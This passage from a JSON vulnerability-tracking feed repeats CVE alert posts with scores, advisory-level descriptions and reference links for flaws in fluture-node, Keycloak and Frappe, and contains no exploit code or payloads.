"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-32X6-QVW6-MXJ4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13117", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-24719\n\ud83d\udd25 CVSS Score: 2.6 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Fluture-Node is a FP-style HTTP and streaming utils for Node based on Fluture. Using `followRedirects` or `followRedirectsWith` with any of the redirection strategies built into fluture-node 4.0.0 or 4.0.1, paired with a request that includes confidential headers such as Authorization or Cookie, exposes you to a vulnerability where, if the destination server were to redirect the request to a server on a third-party domain, or the same domain over unencrypted HTTP, the headers would be included in the follow-up request and be exposed to the third party, or potential http traffic sniffing. The redirection strategies made available in version 4.0.2 automatically redact confidential headers when a redirect is followed across to another origin. A workaround has been identified by using a custom redirection strategy via the `followRedirectsWith` function. The custom strategy can be based on the new strategies available in fluture-node@4.0.2.\n\ud83d\udccf Published: 2022-03-01T20:20:13.000Z\n\ud83d\udccf Modified: 2025-04-23T18:59:31.760Z\n\ud83d\udd17 References:\n1. https://github.com/fluture-js/fluture-node/security/advisories/GHSA-32x6-qvw6-mxj4\n2. https://github.com/psf/requests/pull/4718\n3. https://github.com/fluture-js/fluture-node/commit/0c99bc511533d48be17dc6bfe641f7d0aeb34d77\n4. https://github.com/fluture-js/fluture-node/commit/125e4474f910c1507f8ec3232848626fbc0f55c4", "creation_timestamp": "2025-04-23T19:05:12.000000Z"}, {"uuid": "36631287-2b65-4bdd-9514-7366bcec26c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6503", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14525", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7260\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: An open redirect vulnerability was found in Keycloak. A specially crafted URL can be constructed where the referrer and referrer_uri parameters are made to trick a user to visit a malicious webpage. A trusted URL can trick users and automation into believing that the URL is safe, when, in fact, it redirects to a malicious server. This issue can result in a victim inadvertently trusting the destination of the redirect, potentially leading to a successful phishing attack or other types of attacks.\n\nOnce a crafted URL is made, it can be sent to a Keycloak admin via email for example. This will trigger this vulnerability when the user visits the page and clicks the link. A malicious actor can use this to target users they know are Keycloak admins for further attacks. It may also be possible to bypass other domain-related security checks, such as supplying this as a OAuth redirect uri. The malicious actor can further obfuscate the redirect_uri using URL encoding, to hide the text of the actual malicious website domain.\n\ud83d\udccf Published: 2024-09-09T18:49:59.437Z\n\ud83d\udccf Modified: 2025-05-02T17:06:54.631Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:6502\n2. https://access.redhat.com/errata/RHSA-2024:6503\n3. https://access.redhat.com/security/cve/CVE-2024-7260\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2301875", "creation_timestamp": "2025-05-02T17:16:24.000000Z"}, {"uuid": "9c6d10cf-215d-4f99-8879-1785adfd5be7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6502", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14525", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7260\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: An open redirect vulnerability was found in Keycloak. A specially crafted URL can be constructed where the referrer and referrer_uri parameters are made to trick a user to visit a malicious webpage. A trusted URL can trick users and automation into believing that the URL is safe, when, in fact, it redirects to a malicious server. This issue can result in a victim inadvertently trusting the destination of the redirect, potentially leading to a successful phishing attack or other types of attacks.\n\nOnce a crafted URL is made, it can be sent to a Keycloak admin via email for example. This will trigger this vulnerability when the user visits the page and clicks the link. A malicious actor can use this to target users they know are Keycloak admins for further attacks. It may also be possible to bypass other domain-related security checks, such as supplying this as a OAuth redirect uri. The malicious actor can further obfuscate the redirect_uri using URL encoding, to hide the text of the actual malicious website domain.\n\ud83d\udccf Published: 2024-09-09T18:49:59.437Z\n\ud83d\udccf Modified: 2025-05-02T17:06:54.631Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:6502\n2. https://access.redhat.com/errata/RHSA-2024:6503\n3. https://access.redhat.com/security/cve/CVE-2024-7260\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2301875", "creation_timestamp": "2025-05-02T17:16:24.000000Z"}, {"uuid": "9abf7470-1b81-4d27-9491-5c772d6a10b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6880", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14524", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8883\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n\ud83d\udccf Published: 2024-09-19T15:48:28.468Z\n\ud83d\udccf Modified: 2025-05-02T17:07:25.650Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10385\n2. https://access.redhat.com/errata/RHSA-2024:10386\n3. https://access.redhat.com/errata/RHSA-2024:6878\n4. https://access.redhat.com/errata/RHSA-2024:6879\n5. https://access.redhat.com/errata/RHSA-2024:6880\n6. https://access.redhat.com/errata/RHSA-2024:6882\n7. https://access.redhat.com/errata/RHSA-2024:6886\n8. https://access.redhat.com/errata/RHSA-2024:6887\n9. https://access.redhat.com/errata/RHSA-2024:6888\n10. https://access.redhat.com/errata/RHSA-2024:6889\n11. https://access.redhat.com/errata/RHSA-2024:6890\n12. https://access.redhat.com/errata/RHSA-2024:8823\n13. https://access.redhat.com/errata/RHSA-2024:8824\n14. https://access.redhat.com/errata/RHSA-2024:8826\n15. https://access.redhat.com/security/cve/CVE-2024-8883\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2312511\n17. https://github.com/keycloak/keycloak/blob/main/services/src/main/java/org/keycloak/protocol/oidc/utils/RedirectUtils.java", "creation_timestamp": "2025-05-02T17:16:23.000000Z"}, {"uuid": "0281c610-2e2e-4681-9bc6-4df91457c034", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6888", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14524", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8883\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n\ud83d\udccf Published: 2024-09-19T15:48:28.468Z\n\ud83d\udccf Modified: 2025-05-02T17:07:25.650Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10385\n2. https://access.redhat.com/errata/RHSA-2024:10386\n3. https://access.redhat.com/errata/RHSA-2024:6878\n4. https://access.redhat.com/errata/RHSA-2024:6879\n5. https://access.redhat.com/errata/RHSA-2024:6880\n6. https://access.redhat.com/errata/RHSA-2024:6882\n7. https://access.redhat.com/errata/RHSA-2024:6886\n8. https://access.redhat.com/errata/RHSA-2024:6887\n9. https://access.redhat.com/errata/RHSA-2024:6888\n10. https://access.redhat.com/errata/RHSA-2024:6889\n11. https://access.redhat.com/errata/RHSA-2024:6890\n12. https://access.redhat.com/errata/RHSA-2024:8823\n13. https://access.redhat.com/errata/RHSA-2024:8824\n14. https://access.redhat.com/errata/RHSA-2024:8826\n15. https://access.redhat.com/security/cve/CVE-2024-8883\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2312511\n17. https://github.com/keycloak/keycloak/blob/main/services/src/main/java/org/keycloak/protocol/oidc/utils/RedirectUtils.java", "creation_timestamp": "2025-05-02T17:16:23.000000Z"}, {"uuid": "2d50eb72-1869-4be7-a2d2-74bc880b6d25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8826", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14524", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8883\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n\ud83d\udccf Published: 2024-09-19T15:48:28.468Z\n\ud83d\udccf Modified: 2025-05-02T17:07:25.650Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10385\n2. https://access.redhat.com/errata/RHSA-2024:10386\n3. https://access.redhat.com/errata/RHSA-2024:6878\n4. https://access.redhat.com/errata/RHSA-2024:6879\n5. https://access.redhat.com/errata/RHSA-2024:6880\n6. https://access.redhat.com/errata/RHSA-2024:6882\n7. https://access.redhat.com/errata/RHSA-2024:6886\n8. https://access.redhat.com/errata/RHSA-2024:6887\n9. https://access.redhat.com/errata/RHSA-2024:6888\n10. https://access.redhat.com/errata/RHSA-2024:6889\n11. https://access.redhat.com/errata/RHSA-2024:6890\n12. https://access.redhat.com/errata/RHSA-2024:8823\n13. https://access.redhat.com/errata/RHSA-2024:8824\n14. https://access.redhat.com/errata/RHSA-2024:8826\n15. https://access.redhat.com/security/cve/CVE-2024-8883\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2312511\n17. https://github.com/keycloak/keycloak/blob/main/services/src/main/java/org/keycloak/protocol/oidc/utils/RedirectUtils.java", "creation_timestamp": "2025-05-02T17:16:23.000000Z"}, {"uuid": "05c9fcce-4074-4628-84da-b3243f5d253c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8824", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14524", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8883\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n\ud83d\udccf Published: 2024-09-19T15:48:28.468Z\n\ud83d\udccf Modified: 2025-05-02T17:07:25.650Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10385\n2. https://access.redhat.com/errata/RHSA-2024:10386\n3. https://access.redhat.com/errata/RHSA-2024:6878\n4. https://access.redhat.com/errata/RHSA-2024:6879\n5. https://access.redhat.com/errata/RHSA-2024:6880\n6. https://access.redhat.com/errata/RHSA-2024:6882\n7. https://access.redhat.com/errata/RHSA-2024:6886\n8. https://access.redhat.com/errata/RHSA-2024:6887\n9. https://access.redhat.com/errata/RHSA-2024:6888\n10. https://access.redhat.com/errata/RHSA-2024:6889\n11. https://access.redhat.com/errata/RHSA-2024:6890\n12. https://access.redhat.com/errata/RHSA-2024:8823\n13. https://access.redhat.com/errata/RHSA-2024:8824\n14. https://access.redhat.com/errata/RHSA-2024:8826\n15. https://access.redhat.com/security/cve/CVE-2024-8883\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2312511\n17. https://github.com/keycloak/keycloak/blob/main/services/src/main/java/org/keycloak/protocol/oidc/utils/RedirectUtils.java", "creation_timestamp": "2025-05-02T17:16:23.000000Z"}, {"uuid": "66927473-f28b-42fd-adef-4cd4489054ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6887", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14524", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8883\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n\ud83d\udccf Published: 2024-09-19T15:48:28.468Z\n\ud83d\udccf Modified: 2025-05-02T17:07:25.650Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10385\n2. https://access.redhat.com/errata/RHSA-2024:10386\n3. https://access.redhat.com/errata/RHSA-2024:6878\n4. https://access.redhat.com/errata/RHSA-2024:6879\n5. https://access.redhat.com/errata/RHSA-2024:6880\n6. https://access.redhat.com/errata/RHSA-2024:6882\n7. https://access.redhat.com/errata/RHSA-2024:6886\n8. https://access.redhat.com/errata/RHSA-2024:6887\n9. https://access.redhat.com/errata/RHSA-2024:6888\n10. https://access.redhat.com/errata/RHSA-2024:6889\n11. https://access.redhat.com/errata/RHSA-2024:6890\n12. https://access.redhat.com/errata/RHSA-2024:8823\n13. https://access.redhat.com/errata/RHSA-2024:8824\n14. https://access.redhat.com/errata/RHSA-2024:8826\n15. https://access.redhat.com/security/cve/CVE-2024-8883\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2312511\n17. https://github.com/keycloak/keycloak/blob/main/services/src/main/java/org/keycloak/protocol/oidc/utils/RedirectUtils.java", "creation_timestamp": "2025-05-02T17:16:23.000000Z"}, {"uuid": "019affa5-d09f-4b44-8e7c-70ae488b47d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6878", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14524", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8883\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n\ud83d\udccf Published: 2024-09-19T15:48:28.468Z\n\ud83d\udccf Modified: 2025-05-02T17:07:25.650Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10385\n2. https://access.redhat.com/errata/RHSA-2024:10386\n3. https://access.redhat.com/errata/RHSA-2024:6878\n4. https://access.redhat.com/errata/RHSA-2024:6879\n5. https://access.redhat.com/errata/RHSA-2024:6880\n6. https://access.redhat.com/errata/RHSA-2024:6882\n7. https://access.redhat.com/errata/RHSA-2024:6886\n8. https://access.redhat.com/errata/RHSA-2024:6887\n9. https://access.redhat.com/errata/RHSA-2024:6888\n10. https://access.redhat.com/errata/RHSA-2024:6889\n11. https://access.redhat.com/errata/RHSA-2024:6890\n12. https://access.redhat.com/errata/RHSA-2024:8823\n13. https://access.redhat.com/errata/RHSA-2024:8824\n14. https://access.redhat.com/errata/RHSA-2024:8826\n15. https://access.redhat.com/security/cve/CVE-2024-8883\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2312511\n17. https://github.com/keycloak/keycloak/blob/main/services/src/main/java/org/keycloak/protocol/oidc/utils/RedirectUtils.java", "creation_timestamp": "2025-05-02T17:16:23.000000Z"}, {"uuid": "d9c8c87d-62d4-445a-a5cb-e32e50158136", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6890", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14524", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8883\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n\ud83d\udccf Published: 2024-09-19T15:48:28.468Z\n\ud83d\udccf Modified: 2025-05-02T17:07:25.650Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10385\n2. https://access.redhat.com/errata/RHSA-2024:10386\n3. https://access.redhat.com/errata/RHSA-2024:6878\n4. https://access.redhat.com/errata/RHSA-2024:6879\n5. https://access.redhat.com/errata/RHSA-2024:6880\n6. https://access.redhat.com/errata/RHSA-2024:6882\n7. https://access.redhat.com/errata/RHSA-2024:6886\n8. https://access.redhat.com/errata/RHSA-2024:6887\n9. https://access.redhat.com/errata/RHSA-2024:6888\n10. https://access.redhat.com/errata/RHSA-2024:6889\n11. https://access.redhat.com/errata/RHSA-2024:6890\n12. https://access.redhat.com/errata/RHSA-2024:8823\n13. https://access.redhat.com/errata/RHSA-2024:8824\n14. https://access.redhat.com/errata/RHSA-2024:8826\n15. https://access.redhat.com/security/cve/CVE-2024-8883\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2312511\n17. https://github.com/keycloak/keycloak/blob/main/services/src/main/java/org/keycloak/protocol/oidc/utils/RedirectUtils.java", "creation_timestamp": "2025-05-02T17:16:23.000000Z"}, {"uuid": "d18f05f5-b221-459e-a9d6-761c806b43b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6882", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14524", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8883\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n\ud83d\udccf Published: 2024-09-19T15:48:28.468Z\n\ud83d\udccf Modified: 2025-05-02T17:07:25.650Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10385\n2. https://access.redhat.com/errata/RHSA-2024:10386\n3. https://access.redhat.com/errata/RHSA-2024:6878\n4. https://access.redhat.com/errata/RHSA-2024:6879\n5. https://access.redhat.com/errata/RHSA-2024:6880\n6. https://access.redhat.com/errata/RHSA-2024:6882\n7. https://access.redhat.com/errata/RHSA-2024:6886\n8. https://access.redhat.com/errata/RHSA-2024:6887\n9. https://access.redhat.com/errata/RHSA-2024:6888\n10. https://access.redhat.com/errata/RHSA-2024:6889\n11. https://access.redhat.com/errata/RHSA-2024:6890\n12. https://access.redhat.com/errata/RHSA-2024:8823\n13. https://access.redhat.com/errata/RHSA-2024:8824\n14. https://access.redhat.com/errata/RHSA-2024:8826\n15. https://access.redhat.com/security/cve/CVE-2024-8883\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2312511\n17. https://github.com/keycloak/keycloak/blob/main/services/src/main/java/org/keycloak/protocol/oidc/utils/RedirectUtils.java", "creation_timestamp": "2025-05-02T17:16:23.000000Z"}, {"uuid": "e27dc597-db0a-4fd8-a4c1-60d5ce291e9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6889", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14524", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8883\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n\ud83d\udccf Published: 2024-09-19T15:48:28.468Z\n\ud83d\udccf Modified: 2025-05-02T17:07:25.650Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10385\n2. https://access.redhat.com/errata/RHSA-2024:10386\n3. https://access.redhat.com/errata/RHSA-2024:6878\n4. https://access.redhat.com/errata/RHSA-2024:6879\n5. https://access.redhat.com/errata/RHSA-2024:6880\n6. https://access.redhat.com/errata/RHSA-2024:6882\n7. https://access.redhat.com/errata/RHSA-2024:6886\n8. https://access.redhat.com/errata/RHSA-2024:6887\n9. https://access.redhat.com/errata/RHSA-2024:6888\n10. https://access.redhat.com/errata/RHSA-2024:6889\n11. https://access.redhat.com/errata/RHSA-2024:6890\n12. https://access.redhat.com/errata/RHSA-2024:8823\n13. https://access.redhat.com/errata/RHSA-2024:8824\n14. https://access.redhat.com/errata/RHSA-2024:8826\n15. https://access.redhat.com/security/cve/CVE-2024-8883\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2312511\n17. https://github.com/keycloak/keycloak/blob/main/services/src/main/java/org/keycloak/protocol/oidc/utils/RedirectUtils.java", "creation_timestamp": "2025-05-02T17:16:23.000000Z"}, {"uuid": "a0b63361-db5a-49b2-8ded-a32a99827278", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MHJ8-JFHF-MCW9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19977", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52895\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Frappe is a full-stack web application framework. Prior to versions 14.94.3 and 15.58.0, SQL injection could be achieved via a specially crafted request, which could allow malicious person to gain access to sensitive information. This issue has been patched in versions 14.94.3 and 15.58.0. There are no workarounds for this issue other than upgrading.\n\ud83d\udccf Published: 2025-06-30T17:05:36.027Z\n\ud83d\udccf Modified: 2025-06-30T20:40:43.365Z\n\ud83d\udd17 References:\n1. https://github.com/frappe/frappe/security/advisories/GHSA-mhj8-jfhf-mcw9\n2. https://github.com/frappe/frappe/pull/31526\n3. https://github.com/frappe/frappe/commit/c795e351be033070174437324d74f44759a744a6\n4. https://github.com/frappe/frappe/commit/f0933590103c80c6393647dd0403d399e64c951c", "creation_timestamp": "2025-06-30T21:09:25.000000Z"}, {"uuid": "eeeb0b56-7646-4dff-838e-2e26d98073c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6886", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14524", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8883\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n\ud83d\udccf Published: 2024-09-19T15:48:28.468Z\n\ud83d\udccf Modified: 2025-05-02T17:07:25.650Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10385\n2. https://access.redhat.com/errata/RHSA-2024:10386\n3. https://access.redhat.com/errata/RHSA-2024:6878\n4. https://access.redhat.com/errata/RHSA-2024:6879\n5. https://access.redhat.com/errata/RHSA-2024:6880\n6. https://access.redhat.com/errata/RHSA-2024:6882\n7. https://access.redhat.com/errata/RHSA-2024:6886\n8. https://access.redhat.com/errata/RHSA-2024:6887\n9. https://access.redhat.com/errata/RHSA-2024:6888\n10. https://access.redhat.com/errata/RHSA-2024:6889\n11. https://access.redhat.com/errata/RHSA-2024:6890\n12. https://access.redhat.com/errata/RHSA-2024:8823\n13. https://access.redhat.com/errata/RHSA-2024:8824\n14. https://access.redhat.com/errata/RHSA-2024:8826\n15. https://access.redhat.com/security/cve/CVE-2024-8883\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2312511\n17. https://github.com/keycloak/keycloak/blob/main/services/src/main/java/org/keycloak/protocol/oidc/utils/RedirectUtils.java", "creation_timestamp": "2025-05-02T17:16:23.000000Z"}, {"uuid": "2ac2b320-8317-44e8-a725-c17f2e935d20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6879", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14524", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8883\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n\ud83d\udccf Published: 2024-09-19T15:48:28.468Z\n\ud83d\udccf Modified: 2025-05-02T17:07:25.650Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10385\n2. https://access.redhat.com/errata/RHSA-2024:10386\n3. https://access.redhat.com/errata/RHSA-2024:6878\n4. https://access.redhat.com/errata/RHSA-2024:6879\n5. https://access.redhat.com/errata/RHSA-2024:6880\n6. https://access.redhat.com/errata/RHSA-2024:6882\n7. https://access.redhat.com/errata/RHSA-2024:6886\n8. https://access.redhat.com/errata/RHSA-2024:6887\n9. https://access.redhat.com/errata/RHSA-2024:6888\n10. https://access.redhat.com/errata/RHSA-2024:6889\n11. https://access.redhat.com/errata/RHSA-2024:6890\n12. https://access.redhat.com/errata/RHSA-2024:8823\n13. https://access.redhat.com/errata/RHSA-2024:8824\n14. https://access.redhat.com/errata/RHSA-2024:8826\n15. https://access.redhat.com/security/cve/CVE-2024-8883\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2312511\n17. https://github.com/keycloak/keycloak/blob/main/services/src/main/java/org/keycloak/protocol/oidc/utils/RedirectUtils.java", "creation_timestamp": "2025-05-02T17:16:23.000000Z"}, {"uuid": "f03d3fd2-9f21-43e9-9da2-2e9e12c0e48a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8823", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14524", "content": "\ud83d\udd17 DarkWebInformer.com - 